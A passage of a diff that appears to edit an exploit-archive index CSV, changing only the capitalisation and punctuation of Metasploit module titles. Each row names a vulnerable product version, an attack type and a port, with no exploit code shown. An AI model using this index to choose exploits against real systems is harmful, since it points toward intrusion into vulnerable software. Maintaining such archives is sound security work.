16519,platforms/windows/remote/16519.rb,"Yahoo! Messenger 8.1.0.249 - ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16520,platforms/windows/remote/16520.rb,"VeryPDF PDFView - OCX ActiveX OpenPDF Heap Overflow Exploit",2010-09-20,Metasploit,windows,remote,0 -16521,platforms/windows/remote/16521.rb,"Windows Media Encoder 9 - wmex.dll ActiveX Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16521,platforms/windows/remote/16521.rb,"Microsoft Windows Media Encoder 9 - wmex.dll ActiveX Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16522,platforms/windows/remote/16522.rb,"Yahoo! Messenger - YVerInfo.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16523,platforms/windows/remote/16523.rb,"Novell iPrint Client - ActiveX Control target-frame Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16524,platforms/windows/remote/16524.rb,"AwingSoft Winds3D Player - SceneURL Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16525,platforms/windows/remote/16525.rb,"AOL Instant Messenger - goaway Overflow",2010-07-03,Metasploit,windows,remote,0 -16526,platforms/windows/remote/16526.rb,"Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",2010-08-12,Metasploit,windows,remote,0 +16526,platforms/windows/remote/16526.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)",2010-08-12,Metasploit,windows,remote,0 16527,platforms/windows/remote/16527.rb,"Apple QuickTime 7.1.3 - RTSP URI Buffer Overflow",2010-05-04,Metasploit,windows,remote,0 16528,platforms/windows/remote/16528.rb,"Symantec Altiris Deployment Solution - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16529,platforms/windows/remote/16529.rb,"WinDVD7 - IASystemInfo.dll ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14365,7 +14366,7 @@ id,file,description,date,author,platform,type,port 16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer - ActiveX Control Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16560,platforms/windows/remote/16560.rb,"Autodesk IDrop - ActiveX Control Heap Memory Corruption",2010-04-30,Metasploit,windows,remote,0 16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution",2010-09-20,Metasploit,windows,remote,0 -16562,platforms/windows/local/16562.rb,"Apple ITunes 4.7 - Playlist Buffer Overflow",2010-05-09,Metasploit,windows,local,0 +16562,platforms/windows/local/16562.rb,"Apple iTunes 4.7 - Playlist Buffer Overflow",2010-05-09,Metasploit,windows,local,0 16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer - vcst_eu.dll ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow",2010-07-03,Metasploit,windows,remote,0 16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll 4.9 - ActiveX Remote Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14376,7 +14377,7 @@ id,file,description,date,author,platform,type,port 16570,platforms/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 - SceneURL Download and Execute",2010-09-20,Metasploit,windows,remote,0 16571,platforms/windows/remote/16571.rb,"iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16572,platforms/windows/remote/16572.rb,"GOM Player - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16573,platforms/windows/remote/16573.rb,"Macrovision InstallShield Update Service - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 +16573,platforms/windows/remote/16573.rb,"Macrovision Installshield Update Service - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16574,platforms/windows/remote/16574.rb,"Microsoft Windows - Shell LNK Code Execution",2010-09-21,Metasploit,windows,remote,0 16575,platforms/windows/remote/16575.rb,"SAP AG SAPgui EAI WebViewer3D - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16576,platforms/windows/remote/16576.rb,"Persits XUpload - ActiveX AddFile Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 @@ -14393,7 +14394,7 @@ id,file,description,date,author,platform,type,port 16587,platforms/windows/remote/16587.rb,"Sun Java - Runtime New Plugin docbase Buffer Overflow",2011-01-08,Metasploit,windows,remote,0 16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 - _Marshaled_pUnk Code Execution",2011-01-08,Metasploit,windows,local,0 -16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviors Use-After-Free",2010-12-14,Metasploit,windows,remote,0 +16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviour Use-After-Free",2010-12-14,Metasploit,windows,remote,0 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit (1)",2010-06-15,Metasploit,windows,local,0 @@ -14405,7 +14406,7 @@ id,file,description,date,author,platform,type,port 16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - 'Aurora' Memory Corruption",2010-07-12,Metasploit,windows,remote,0 16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution - ActiveX Control Arbitrary File Download and Execute",2010-11-24,Metasploit,windows,remote,0 16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading - ActiveX Control Buffer Overflow",2010-06-15,Metasploit,windows,remote,0 -16602,platforms/windows/remote/16602.rb,"Macrovision InstallShield Update Service - ActiveX Unsafe Method",2010-09-20,Metasploit,windows,remote,0 +16602,platforms/windows/remote/16602.rb,"Macrovision Installshield Update Service - ActiveX Unsafe Method",2010-09-20,Metasploit,windows,remote,0 16603,platforms/windows/remote/16603.rb,"NCTAudioFile2 2.x - ActiveX Control SetFormatLikeSample() Buffer Overflow",2010-07-03,Metasploit,windows,remote,0 16604,platforms/windows/remote/16604.rb,"WebEx UCF - atucfobj.dll ActiveX NewObject Method Buffer Overflow",2010-09-20,Metasploit,windows,remote,0 16605,platforms/windows/remote/16605.rb,"Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download",2010-09-20,Metasploit,windows,remote,0 @@ -14415,7 +14416,7 @@ id,file,description,date,author,platform,type,port 16609,platforms/windows/remote/16609.rb,"Electronic Arts SnoopyCtrl - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16610,platforms/windows/remote/16610.rb,"Symantec Norton Internet Security 2004 - ActiveX Control Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) - Buffer Overflow",2010-05-09,Metasploit,windows,remote,0 -16612,platforms/windows/remote/16612.rb,"Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution",2010-09-20,Metasploit,windows,remote,0 +16612,platforms/windows/remote/16612.rb,"Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution",2010-09-20,Metasploit,windows,remote,0 16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 16614,platforms/windows/local/16614.rb,"Adobe Flash Player - 'newfunction' Invalid Pointer Use (1)",2010-09-20,Metasploit,windows,local,0 16615,platforms/windows/local/16615.rb,"Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption",2010-04-30,Metasploit,windows,local,0 @@ -14430,11 +14431,11 @@ id,file,description,date,author,platform,type,port 16624,platforms/windows/local/16624.rb,"Adobe - util.printf() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16625,platforms/windows/local/16625.rb,"Microsoft Excel - Malformed FEATHEADER Record",2010-09-25,Metasploit,windows,local,0 16626,platforms/windows/local/16626.rb,"Audiotran 1.4.1 - '.pls' Stack Buffer Overflow",2010-01-28,Metasploit,windows,local,0 -16627,platforms/windows/local/16627.rb,"UltraISO - .cue File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 +16627,platforms/windows/local/16627.rb,"UltraISO - '.cue' File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16628,platforms/windows/local/16628.rb,"Fat Player Media Player 0.6b0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16629,platforms/windows/local/16629.rb,"VideoLAN VLC - TiVo Buffer Overflow",2011-02-02,Metasploit,windows,local,0 16630,platforms/windows/remote/16630.rb,"CA eTrust PestPatrol - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow (3)",2010-09-25,Metasploit,windows,local,0 +16631,platforms/windows/local/16631.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (3)",2010-09-25,Metasploit,windows,local,0 16632,platforms/windows/local/16632.rb,"ACDSee - XPM File Section Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16633,platforms/windows/local/16633.rb,"Steinberg MyMP3Player 3.0 - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16634,platforms/windows/local/16634.rb,"Free Download Manager - Torrent Parsing Buffer Overflow",2010-09-25,Metasploit,windows,local,0 @@ -14443,7 +14444,7 @@ id,file,description,date,author,platform,type,port 16637,platforms/windows/local/16637.rb,"VideoLAN VLC - MKV Memory Corruption",2011-02-08,Metasploit,windows,local,0 16638,platforms/windows/remote/16638.rb,"DjVu - DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow",2010-09-25,Metasploit,windows,remote,0 16639,platforms/windows/remote/16639.rb,"McAfee Remediation Client - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16640,platforms/windows/local/16640.rb,"FeedDemon 3.1.0.12 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16640,platforms/windows/local/16640.rb,"feedDemon 3.1.0.12 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16641,platforms/windows/remote/16641.rb,"SasCam Webcam Server 2.6.5 - Get() method Buffer Overflow",2010-09-25,Metasploit,windows,remote,0 16642,platforms/windows/local/16642.rb,"WM Downloader 3.1.2.2 - Buffer Overflow (2)",2010-11-11,Metasploit,windows,local,0 16643,platforms/windows/local/16643.rb,"SafeNet SoftRemote - GROUPNAME Buffer Overflow",2010-11-11,Metasploit,windows,local,0 @@ -14451,9 +14452,9 @@ id,file,description,date,author,platform,type,port 16645,platforms/windows/local/16645.rb,"URSoft W32Dasm 8.93 - Disassembler Function Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16646,platforms/windows/local/16646.rb,"HT-MP3Player 1.0 HT3 - File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16647,platforms/windows/remote/16647.rb,"EMC ApplicationXtender (KeyWorks) - ActiveX Control Buffer Overflow",2010-11-11,Metasploit,windows,remote,0 -16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 +16648,platforms/windows/local/16648.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16649,platforms/windows/remote/16649.rb,"Microsoft Works 7 - WkImgSrv.dll WKsPictureInterface() ActiveX Exploit",2010-09-25,Metasploit,windows,remote,0 -16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - (.xpl) universal Local Buffer Overflow (SEH) (2)",2010-09-25,Metasploit,windows,local,0 +16650,platforms/windows/local/16650.rb,"Xenorate 2.50 - '.xpl' Universal Local Buffer Overflow (SEH) (2)",2010-09-25,Metasploit,windows,local,0 16651,platforms/windows/local/16651.rb,"AOL 9.5 - Phobos.Playlist Import() Stack Based Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16652,platforms/windows/local/16652.rb,"Adobe - FlateDecode Stream Predictor 02 Integer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16653,platforms/windows/local/16653.rb,"Xion Audio Player 1.0.126 - Unicode Stack Buffer Overflow",2010-12-16,Metasploit,windows,local,0 @@ -14461,7 +14462,7 @@ id,file,description,date,author,platform,type,port 16655,platforms/windows/local/16655.rb,"ProShow Gold 4.0.2549 - '.psh' Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16656,platforms/windows/local/16656.rb,"Altap Salamander 2.5 PE Viewer - Buffer Overflow",2010-12-16,Metasploit,windows,local,0 16657,platforms/aix/dos/16657.rb,"PointDev IDEAL Migration - Buffer Overflow",2010-09-25,Metasploit,aix,dos,0 -16658,platforms/windows/local/16658.rb,"VUPlayer - (.cue) Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 +16658,platforms/windows/local/16658.rb,"VUPlayer - '.cue' Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,local,0 16659,platforms/aix/local/16659.rb,"Cain & Abel 4.9.24 - RDP Buffer Overflow",2010-11-24,Metasploit,aix,local,0 16660,platforms/windows/local/16660.rb,"Microsoft Windows - CreateSizedDIBSECTION Stack Buffer Overflow",2011-02-08,Metasploit,windows,local,0 16661,platforms/windows/local/16661.rb,"Audio Workstation 6.4.2.4.3 - pls Buffer Overflow",2010-09-25,Metasploit,windows,local,0 @@ -14469,7 +14470,7 @@ id,file,description,date,author,platform,type,port 16663,platforms/windows/local/16663.rb,"S.O.M.P.L 1.0 Player - Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer - TextBytesAtom Stack Buffer Overflow",2010-09-25,Metasploit,windows,local,0 -16666,platforms/windows/local/16666.rb,"UltraISO - .CCD File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 +16666,platforms/windows/local/16666.rb,"UltraISO - '.CCD' File Parsing Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16667,platforms/windows/local/16667.rb,"Adobe Flash Player - 'Button' Remote Code Execution",2010-11-01,Metasploit,windows,local,0 16668,platforms/windows/local/16668.rb,"BACnet OPC Client - Buffer Overflow (2)",2010-11-14,Metasploit,windows,local,0 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow",2010-09-25,Metasploit,windows,local,0 @@ -14479,14 +14480,14 @@ id,file,description,date,author,platform,type,port 16673,platforms/windows/local/16673.rb,"Digital Music Pad 8.2.3.3.4 - Stack Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16674,platforms/windows/local/16674.rb,"Adobe - Collab.collectEmailInfo() Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16675,platforms/windows/local/16675.rb,"AstonSoft DeepBurner - '.dbr' Path Buffer Overflow",2010-09-20,Metasploit,windows,local,0 -16676,platforms/windows/local/16676.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow (2)",2011-01-08,Metasploit,windows,local,0 -16677,platforms/windows/local/16677.rb,"CA Antivirus Engine - CAB Buffer Overflow",2010-11-11,Metasploit,windows,local,0 +16676,platforms/windows/local/16676.rb,"Mini-stream 3.0.1.1 - Buffer Overflow (2)",2011-01-08,Metasploit,windows,local,0 +16677,platforms/windows/local/16677.rb,"CA AntiVirus Engine - CAB Buffer Overflow",2010-11-11,Metasploit,windows,local,0 16678,platforms/windows/local/16678.rb,"VideoLAN Client (VLC) (Windows/x86) - smb:// URI Buffer Overflow",2010-09-20,Metasploit,windows,local,0 16679,platforms/windows/local/16679.rb,"Nuance PDF Reader 6.0 - Launch Stack Buffer Overflow",2011-01-08,Metasploit,windows,local,0 -16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - .VBP Buffer Overflow",2010-09-25,Metasploit,windows,local,0 +16680,platforms/windows/local/16680.rb,"Microsoft Visual Basic - '.VBP' Buffer Overflow",2010-09-25,Metasploit,windows,local,0 16681,platforms/windows/local/16681.rb,"Adobe - Collab.getIcon() Buffer Overflow (2)",2010-09-25,Metasploit,windows,local,0 16682,platforms/windows/local/16682.rb,"Adobe PDF - Escape EXE Social Engineering (No JavaScript)",2010-12-16,Metasploit,windows,local,0 -16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - (.hhp) Buffer Overflow (4)",2010-09-25,Metasploit,windows,local,0 +16683,platforms/windows/local/16683.rb,"HTML Help Workshop 4.74 - '.hhp' Buffer Overflow (4)",2010-09-25,Metasploit,windows,local,0 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .m3u Buffer Overflow",2010-04-30,Metasploit,windows,local,0 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow",2010-11-05,Metasploit,windows,remote,0 16686,platforms/windows/local/16686.rb,"Microsoft Word - RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,Metasploit,windows,local,0 @@ -14501,12 +14502,12 @@ id,file,description,date,author,platform,type,port 16695,platforms/windows/remote/16695.rb,"Medal Of Honor Allied Assault - getinfo Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,12203 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime - STMux.exe Stack Buffer Overflow",2010-05-09,Metasploit,windows,remote,1533 16697,platforms/windows/remote/16697.rb,"IBM Lotus Domino Web Server - Accept-Language Stack Buffer Overflow",2010-11-11,Metasploit,windows,remote,80 -16698,platforms/windows/remote/16698.rb,"Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,Metasploit,windows,remote,0 +16698,platforms/windows/remote/16698.rb,"Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",2010-09-20,Metasploit,windows,remote,0 16699,platforms/windows/remote/16699.rb,"Outlook - ATTACH_BY_REF_RESOLVE File Execution",2010-09-20,Metasploit,windows,remote,0 16700,platforms/windows/remote/16700.rb,"Outlook - ATTACH_BY_REF_ONLY File Execution",2010-09-20,Metasploit,windows,remote,0 16701,platforms/windows/remote/16701.rb,"MySQL yaSSL (Windows) - SSL Hello Message Buffer Overflow",2010-05-09,Metasploit,windows,remote,3306 16702,platforms/windows/remote/16702.rb,"KarjaSoft Sami FTP Server 2.02 - USER Overflow",2010-04-30,Metasploit,windows,remote,21 -16703,platforms/windows/remote/16703.rb,"GlobalSCAPE Secure FTP Server - Input Overflow",2010-10-05,Metasploit,windows,remote,0 +16703,platforms/windows/remote/16703.rb,"GlobalScape Secure FTP Server - Input Overflow",2010-10-05,Metasploit,windows,remote,0 16704,platforms/windows/remote/16704.rb,"LeapFTP 3.0.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16705,platforms/windows/remote/16705.rb,"Seagull FTP 3.3 build 409 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16706,platforms/windows/remote/16706.rb,"War-FTPD 1.65 - Password Overflow",2010-07-03,Metasploit,windows,remote,0 @@ -14541,9 +14542,9 @@ id,file,description,date,author,platform,type,port 16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow",2010-10-05,Metasploit,windows,remote,0 16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow",2010-04-30,Metasploit,windows,remote,0 -16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Windows/x86) Stack Buffer Overflow (LIST)",2010-11-14,Metasploit,windows,remote,0 +16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 - (Windows/x86) Stack Buffer Overflow 'LIST'",2010-11-14,Metasploit,windows,remote,0 16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow",2010-04-30,Metasploit,windows,remote,21 -16740,platforms/windows/remote/16740.rb,"Microsoft IIS - FTP Server NLST Response Overflow",2010-11-12,Metasploit,windows,remote,21 +16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow",2010-11-12,Metasploit,windows,remote,21 16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow",2010-06-22,Metasploit,windows,remote,0 16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow",2010-05-09,Metasploit,windows,remote,0 16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow",2010-11-14,Metasploit,windows,remote,0 @@ -14555,9 +14556,9 @@ id,file,description,date,author,platform,type,port 16749,platforms/windows/remote/16749.rb,"Microsoft RPC DCOM Interface - Overflow Exploit",2011-01-11,Metasploit,windows,remote,0 16750,platforms/windows/remote/16750.rb,"Microsoft Message Queueing Service - DNS Name Path Overflow",2010-07-25,Metasploit,windows,remote,0 16751,platforms/win_x86/remote/16751.rb,"SHOUTcast DNAS/Win32 1.9.4 - File Request Format String Overflow",2010-04-30,Metasploit,win_x86,remote,0 -16752,platforms/windows/remote/16752.rb,"Apache module mod_rewrite - LDAP protocol Buffer Overflow",2010-02-15,Metasploit,windows,remote,80 +16752,platforms/windows/remote/16752.rb,"Apache module Mod_Rewrite - LDAP protocol Buffer Overflow",2010-02-15,Metasploit,windows,remote,80 16753,platforms/windows/remote/16753.rb,"Xitami 2.5c2 Web Server - If-Modified-Since Overflow",2010-08-25,Metasploit,windows,remote,80 -16754,platforms/windows/remote/16754.rb,"Minishare 1.4.1 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 +16754,platforms/windows/remote/16754.rb,"MiniShare 1.4.1 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,80 16755,platforms/windows/remote/16755.rb,"Novell iManager - getMultiPartParameters Arbitrary File Upload",2010-10-19,Metasploit,windows,remote,8080 16756,platforms/windows/remote/16756.rb,"Sambar 6 - Search Results Buffer Overflow",2010-02-13,Metasploit,windows,remote,80 16757,platforms/windows/remote/16757.rb,"Novell Messenger Server 2.0 - Accept-Language Overflow",2010-09-20,Metasploit,windows,remote,8300 @@ -14566,7 +14567,7 @@ id,file,description,date,author,platform,type,port 16760,platforms/windows/remote/16760.rb,"Private Wire Gateway - Buffer Overflow",2010-04-30,Metasploit,windows,remote,80 16761,platforms/windows/remote/16761.rb,"BadBlue 2.5 - ext.dll Buffer Overflow",2010-07-07,Metasploit,windows,remote,80 16762,platforms/windows/remote/16762.rb,"BEA WebLogic - JSESSIONID Cookie Value Overflow",2010-07-03,Metasploit,windows,remote,80 -16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows/x86) - Header Overwrite",2010-04-30,Metasploit,win_x86,remote,8000 +16763,platforms/win_x86/remote/16763.rb,"Icecast 2.0.1 (Windows x86) - Header Overwrite",2010-04-30,Metasploit,win_x86,remote,8000 16764,platforms/windows/remote/16764.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)",2010-05-09,Metasploit,windows,remote,0 16765,platforms/windows/remote/16765.rb,"MaxDB WebDBM - Database Parameter Overflow",2010-09-20,Metasploit,windows,remote,9999 16766,platforms/windows/remote/16766.rb,"Sybase EAServer 5.2 - Remote Stack Buffer Overflow",2010-06-22,Metasploit,windows,remote,8080 @@ -14578,7 +14579,7 @@ id,file,description,date,author,platform,type,port 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow",2010-08-06,Metasploit,windows,remote,80 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow",2010-05-09,Metasploit,windows,remote,8028 16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.exe Pre-Authentication Stack Buffer Overflow",2010-10-12,Metasploit,windows,remote,0 -16775,platforms/windows/remote/16775.rb,"Rhinosoft Serv-U - Session Cookie Buffer Overflow",2010-03-10,Metasploit,windows,remote,0 +16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U - Session Cookie Buffer Overflow",2010-03-10,Metasploit,windows,remote,0 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow",2010-02-15,Metasploit,windows,remote,0 16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow",2010-07-13,Metasploit,windows,remote,80 16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow",2010-12-15,Metasploit,windows,remote,18881 @@ -14617,12 +14618,12 @@ id,file,description,date,author,platform,type,port 16811,platforms/windows/remote/16811.rb,"TrackerCam - PHP Argument Buffer Overflow",2010-05-09,Metasploit,windows,remote,8090 16812,platforms/windows/remote/16812.rb,"MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow",2010-07-01,Metasploit,windows,remote,3000 16813,platforms/windows/remote/16813.rb,"Novell NetMail 3.52d - NMAP STOR Buffer Overflow",2010-05-09,Metasploit,windows,remote,689 -16814,platforms/windows/remote/16814.rb,"Novell GroupWise Messenger Client - Buffer Overflow",2010-06-22,Metasploit,windows,remote,8300 +16814,platforms/windows/remote/16814.rb,"Novell Groupwise Messenger Client - Buffer Overflow",2010-06-22,Metasploit,windows,remote,8300 16815,platforms/windows/remote/16815.rb,"Novell ZENworks 6.5 - Desktop/Server Management Overflow",2010-07-25,Metasploit,windows,remote,0 16816,platforms/windows/remote/16816.rb,"GAMSoft TelSrv 1.5 - Username Buffer Overflow",2010-06-22,Metasploit,windows,remote,23 16817,platforms/windows/remote/16817.rb,"GoodTech Telnet Server 5.0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,2380 16818,platforms/windows/remote/16818.rb,"YPOPS 0.6 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 -16819,platforms/windows/remote/16819.rb,"SoftiaCom WMailserver 1.0 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 +16819,platforms/windows/remote/16819.rb,"SoftiaCom wMailServer 1.0 - Buffer Overflow",2010-05-09,Metasploit,windows,remote,25 16820,platforms/windows/remote/16820.rb,"Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)",2010-11-11,Metasploit,windows,remote,25 16821,platforms/windows/remote/16821.rb,"Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow",2010-06-22,Metasploit,windows,remote,25 16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow",2010-04-30,Metasploit,windows,remote,25 @@ -14642,12 +14643,12 @@ id,file,description,date,author,platform,type,port 16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow",2010-04-30,Metasploit,linux,remote,0 16837,platforms/linux/remote/16837.rb,"hplip - hpssd.py From Address Arbitrary Command Execution",2010-10-09,Metasploit,linux,remote,0 16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (2)",2011-03-03,Metasploit,linux,remote,0 -16839,platforms/linux/remote/16839.rb,"Borland InterBase - PWD_db_aliased() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 -16840,platforms/linux/remote/16840.rb,"Borland InterBase - open_marker_file() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16839,platforms/linux/remote/16839.rb,"Borland Interbase - PWD_db_aliased() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16840,platforms/linux/remote/16840.rb,"Borland Interbase - open_marker_file() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 16841,platforms/linux/remote/16841.rb,"GLD (Greylisting Daemon) - Postfix Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 16842,platforms/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String",2010-07-03,Metasploit,linux,remote,0 -16843,platforms/linux/remote/16843.rb,"Borland InterBase - jrd8_create_database() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 -16844,platforms/linux/remote/16844.rb,"Borland InterBase - INET_connect() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16843,platforms/linux/remote/16843.rb,"Borland Interbase - jrd8_create_database() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 +16844,platforms/linux/remote/16844.rb,"Borland Interbase - INET_connect() Buffer Overflow",2010-07-03,Metasploit,linux,remote,0 16845,platforms/linux/remote/16845.rb,"Poptop - Negative Read Overflow",2010-11-23,Metasploit,linux,remote,0 16846,platforms/linux/remote/16846.rb,"UoW IMAP server - LSUB Buffer Overflow",2010-03-26,Metasploit,linux,remote,0 16847,platforms/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow",2010-04-30,Metasploit,linux,remote,0 @@ -14667,19 +14668,19 @@ id,file,description,date,author,platform,type,port 16861,platforms/linux/remote/16861.rb,"Samba (Linux/x86) - trans2open Overflow Exploit",2010-07-14,Metasploit,linux,remote,0 16862,platforms/hardware/remote/16862.rb,"iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)",2010-09-20,Metasploit,hardware,remote,0 16863,platforms/osx/remote/16863.rb,"AppleFileServer - LoginExt PathName Overflow",2010-09-20,Metasploit,osx,remote,0 -16864,platforms/osx/remote/16864.rb,"UFO: Alien Invasion IRC Client (OSX) - Buffer Overflow",2010-10-09,Metasploit,osx,remote,0 